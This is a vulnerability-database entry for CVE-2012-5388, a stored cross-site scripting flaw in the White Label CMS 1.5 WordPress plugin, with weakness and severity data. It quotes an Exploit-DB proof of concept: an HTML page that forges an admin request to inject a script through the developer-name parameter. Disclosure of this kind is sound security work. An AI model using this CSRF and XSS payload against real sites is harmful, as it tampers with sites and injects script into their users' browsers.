CVE-2012-5388 : Detail

CVE-2012-5388

Cross-site Scripting
A03-Injection
0.13%V3
Network
2012-10-24
08h00 +00:00
2017-08-28
10h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Cross-site scripting (XSS) vulnerability in wlcms-plugin.php in the White Label CMS plugin 1.5 for WordPress allows remote authenticated administrators to inject arbitrary web script or HTML via the wlcms_o_developer_name parameter in a save action to wp-admin/admin.php, a related issue to CVE-2012-5387.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.

Metrics

Metrics Score Severity CVSS Vector Source
V2 3.5 AV:N/AC:M/Au:S/C:N/I:P/A:N [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 22156

Publication date : 2012-10-21 22h00 +00:00
Author : pcsjj
EDB Verified : Yes

# Exploit Title: White Label CMS v 1.5 CSRF w/ persistent XSS # Date: 21/10/2012 # Exploit Author: pcsjj # Vendor Homepage: http://www.videousermanuals.com/white-label-cms/ # Version: 1.5 # Software Link: http://plugins.svn.wordpress.org/white-label-cms/branches/ # Downloads: 110,313 # CVE : CVE-2012-5387 (CSRF), CVE-2012-5388 (XSS) <html> <title>White Label CMS CSRF</title> <body> <img src='http://[TARGET]/wordpress/wp-admin/admin.php?page=wlcms-plugin.php&action=save&wlcms_o_developer_name="><script>alert("fun")</script><div "'> </body> </html>

Products Mentioned

Configuraton 0

Videousermanuals>>White-label-cms >> Version 1.5

Wordpress>>Wordpress >> Version -

References

http://www.exploit-db.com/exploits/22156/
Tags : exploit, x_refsource_EXPLOIT-DB
http://www.securityfocus.com/bid/56166
Tags : vdb-entry, x_refsource_BID